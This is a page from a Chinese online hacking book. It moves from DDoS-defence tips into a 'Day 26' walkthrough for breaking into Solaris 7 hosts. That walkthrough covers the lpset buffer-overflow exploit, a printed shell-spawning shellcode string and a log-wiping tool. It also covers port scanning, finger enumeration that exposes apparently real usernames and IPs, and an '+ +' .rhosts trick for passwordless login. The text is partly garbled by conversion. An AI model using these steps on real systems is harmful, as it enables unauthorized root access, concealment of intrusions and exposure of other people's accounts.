九味书屋 > 文学经管电子书 > 30天打造专业红客 >

第20部分

30天打造专业红客-第20部分

小说: 30天打造专业红客 字数: 每页4000字

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



多大的效率牺牲为代价的,对你来说是否值得。
  1。防火墙 
禁止对主机的非开放服务的访问 
限制同时打开的SYN最大连接数 
限制特定IP地址的访问 
启用防火墙的防DDoS的属性 
严格限制对外开放的服务器的向外访问
  第五项主要是防止自己的服务器被当做工具去害人。
  2。路由器 
以Cisco路由器为例 
Cisco Express Forwarding(CEF) 
使用 unicast reverse…path 
访问控制列表(ACL)过滤 
设置SYN数据包流量速率 
升级版本过低的ISO 
为路由器建立log server
  其中使用CEF和Unicast设置时要特别注意,使用不当会造成路由器工作效率严重下降,升级IOS也应谨慎。路由器是网络的核心设备,与大家分享一下进行设置修改时的小经验,就是先不保存。Cisco路由器有两份配置startup config和running config,修改的时候改变的是running config,可以让这个配置先跑一段时间(三五天的就随意啦),觉得可行后再保存配置到startup config;而如果不满意想恢复原来的配置,用copy start run就行了。
  ISP / ICP管理员
  ISP / ICP为很多中小型企业提供了各种规模的主机托管业务,所以在防DDoS时,除了与企业网管理员一样的手段外,还要特别注意自己管理范围内的客户托管主机不要成为傀儡机。客观上说,这些托管主机的安全性普遍是很差的,有的连基本的补丁都没有打就赤膊上阵了,成为黑客最喜欢的〃肉鸡〃,因为不管这台机器黑客怎么用都不会有被发现的危险,它的安全管理太差了;还不必说托管的主机都是高性能、高带宽的…简直就是为DDoS定制的。而做为ISP的管理员,对托管主机是没有直接管理的权力的,只能通知让客户来处理。在实际情况时,有很多客户与自己的托管主机服务商配合得不是很好,造成ISP管理员明知自己负责的一台托管主机成为了傀儡机,却没有什么办法的局面。而托管业务又是买方市场,ISP还不敢得罪客户,怎么办?咱们管理员和客户搞好关系吧,没办法,谁让人家是上帝呢?呵呵,客户多配合一些,ISP的主机更安全一些,被别人告状的可能性也小一些。
  骨干网络运营商
这个我们就不说了
因为我们都不是骨干运营商 
『第26天』Sunos (一)
今天我想给大家介绍的是Sunos 。 Sunos是一个非常好的Unix操作系统,功能强大。很多大型公司都采用此系统作为服务器系统。(例如:sina、163等。)至于它的漏洞,也是多不胜数的了。今天我就介绍一下这个系统的漏洞。
Unix:Unix操作系统自70年代由贝尔实验室推出以来,80年代经过大学、研究所、工业实验室的应用和发展,现已成为全球各大学、研究所及工业研究室、计算机网络通信、工作站系统的主流工具,并开始进入商业市场和个人电脑领域。尤其是美国在1994年率先提出信息高速公路(Information Super Highway)的构想,更UNIX的发展应用推波助澜。到目前为止UNIX用户已经达到200万户,其成长速度之惊人,前所未有。UNIX提供多用户、多任务的操作环境,其网络工具使计算机远程通信、并行处理、资源分配等有了更广阔的应用前景。尤其是它的X Window系统函盖了传统的DOS命令行和视窗系统的优点。
 
Solaris与Sunos的版本转换:
Solaris 8 = Sunos 5。8,Solaris 7 = Sunos 5。7,Solaris 2。6 = Sunos 5。6,Solaris 2。5 = Sunos 5。5……
因为自Sunos 5以后,就叫Solaris了。
Solaris也有分服务器版和个人版,它们分别是:
服务器版:sparc
个人版:x86
通常个人是不会安装Solaris的。
Solaris主要的漏洞有:
远程漏洞:
RPC:
rpc。ttdbserverd :Solaris 2。3,2。4, 2。5, 2。5。1, 2。6 
rpc。cmsd:Solaris 2。5, 2。5。1, 2。6, 7 
其他:
sadmind:solaris 2。6, 7 
snmpXdmid:Solaris 7, 8 
本地漏洞:
lpset:Solaris 2。6,7
本次范例需要的系统及程序情况如下:
操作系统:Window2000
对方操作系统:Sunos 5。7 (solaris 7)
程序(一):lpset。c
程序(二):Superscan 3。0
程序(二):wipe…1。00
本机IP:127。0。0。1
测试IP:127。0。0。17
新程序说明:
“lpset。c”是利用solaris 7和solaris 2。6的/usr/bin/lpset …a 缓冲区溢出漏洞所写的一个exploit。
Solaris 7 lpset …a 缓冲区溢出漏洞 
Solaris 2。6和Solaris 7中所带的lpset缺省设置了suid root位,它的一个执行选项〃…a〃在处
理时存在问题,它会将提供给〃…a〃的参数不加判断的拷贝到一个固定大小的buffer(900多字节)
中;当用户提供一个包含可执行代码的很长的字符串时,将导致lpset以root身份执行任意命令。
尽管lpset缺省只允许root和sysadm组的用户执行,但是,由于溢出发生在进行执行权限判断操
作之前,任意本地用户都可以利用这个漏洞获取root权限。
wipe…1。00:unix和liunx下,一个非常好用的日志清除程序。
新名词讲解:
肉鸡:已经被攻击了,具有控制权的主机。
跳板:利用此主机作跳板,攻击其他主机。
shell:shell是系统与用户的交换式界面。简单来说,就是系统与用户的“沟通”环境。我们平时经常用到的DOS,就是一个shell。(Windows2000是cmd。exe)
root:Unix里最高权限的用户。也就是超级管理员。
admin:Windows NT里最高权限的用户。也就是超级管理员。
rootshell:通过一个溢出程序,在主机溢出一个具有root权限的shell。
exploit:溢出程序。exploit里通常包含一些shellcode。
shellcode:溢出攻击要调用API函数,溢出后要有一个交换式界面进行操作。所以就有了shell的code。
char shellcode'' = 〃x31xdbx31xc9x31xc0xb0x46xcdx80〃 〃x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8〃 〃x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89〃 〃x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0〃 〃x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd〃 〃x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9〃 〃xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75〃 〃x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08〃 〃x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh〃;
这就是一个shellcode。
找一个Unix主机也是一种技巧。
1、首先,我们打开superscan。
设置:
IP:(需要扫描的IP地址。)
Start:127。0。0。1
Stop:127。0。0。255
Scan Type:(扫描类型设置。)
All ports from:23|23
然后,点击“Start”,开始扫描。 
2、点击“Prune”,把多余的主机删除。 
3、点击“Expand All”,把所有扫描到的主机打开。这时,在端口下面就会显示一些信息。这些信息就是端口的响应。 
小技巧: 
。。。。。。。。#。。'。。:这种响应,通常是Sunos主机的。 
。。。。。 。。#。。':这种响应,通常是liunx的。 
假设,我们扫描到:127。0。0。17。 
打开,Windows自带的“命令提示符”。
ping 主机:
主要目的是查看主机是否能连接。
D:》ping 127。0。0。17
Pinging 127。0。0。17 with 32 bytes of data:
Reply from 127。0。0。17: bytes=32 time=191ms TTL=241
Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
Reply from 127。0。0。17: bytes=32 time=160ms TTL=241
Reply from 127。0。0。17: bytes=32 time=170ms TTL=241
Ping statistics for 127。0。0。17:
 Packets: Sent = 4; Received = 4; Lost = 0 (0% loss);
Approximate round trip times in milli…seconds:
 Minimum = 160ms; Maximum =  191ms; Average =  172ms
小技巧:
通常 TTL 》 200的,都是liunx或者unix系统。
TTL 《 200的,都是Windows 9x或Windows NT系统。
tel主机:
主要看看tel的banner。
D:》tel 127。0。0。17
SunOS 5。7
login:
solaris 7 的。
接着,我用Superscan扫描主机的端口。
方法:
打开superscan。
设置:
IP:
Start:127。0。0。17
Stop:127。0。0。17
Scan Type:(扫描类型设置。)
All ports from:1|65535
然后,点击“Start”,开始扫描。 
扫描完毕后,点击“Expand All”,把所有扫描到的端口打开。 
* + 211。99。25。1
|___ 7 Echo
|___ 9 Discard
|___ 13 Daytime
|___ 19 Character Generator
|___ 21 File Transfer Protocol 'Control'
|___ 23 Tel
|___ 25 Simple Mail Transfer
|___ 37 Time
|___ 53 Domain Name Server
|___ 79 Finger
|___ 111 SUN Remote Procedure Call
|___ 512 remote process execution;
|___ 513 remote login a la tel;
|___ 514 cmd
|___ 515 spooler
|___ 540 uucpd
主要的端口有:21、25、53、79、111、513
其他还有:22、80等
端口的主要漏洞:
21:FTP的端口。主要漏洞是ftpd。如果允许anonymous(匿名)用户,而且具有读写权限,那么那台机子就是你的啦。假如你具有读写权限的用户密码,那就更加容易了。
22:ssh的端口。例如:SSH 3。0的远程登录漏洞等。
25:sendmail的端口。利用它的漏洞,我们可以D。O。S主机。freebsd的8。8。3版本还可以远程溢出rootshell。
53:DNS的端口。主要漏洞是bind。对于bind 8。2的DNS服务器,我们可以利用exploit溢出一个rootshell。
79:finger的端口。在unix和liunx都很有作用。对于Sunos,我们可以 finger 0@***。***。***。*** 刺探用户。对于,liunx可以 finger @***。***。***。*** 刺探当前在线的用户。
80:web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。
111:rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如:redhat的rpc。statd,Solaris的rpc。ttdbserverd等。
513:rlogin的端口。你可以向主机发送一条:echo '+ +' 》/。rhost 如果成功,就可以不用密码rlogin到主机。
finger主机。
目的是利用finger漏洞寻找主机的用户。(取得主机的用户对入侵主机有很大帮助。)
D:》finger 0@127。0。0。17
'127。0。0。17'
Login NameTTYIdle When Where
daemon ??? 《 。  。  。  。 》
bin ??? 《 。  。  。  。 》
sys ??? 《 。  。  。  。 》
chenhy ???pts/7   61。158。255。225
mdevice???897  61。140。253。142
liuy???pts/5   211。101。132。50
oracle ???console  6:57 Mon 14:29  :0
oracle ???pts/24d Mon 14:29  :0。0
oracle ???pts/522 Sat 16:34  61。140。253。142
D:

返回目录 上一页 下一页 回到顶部 0 0

你可能喜欢的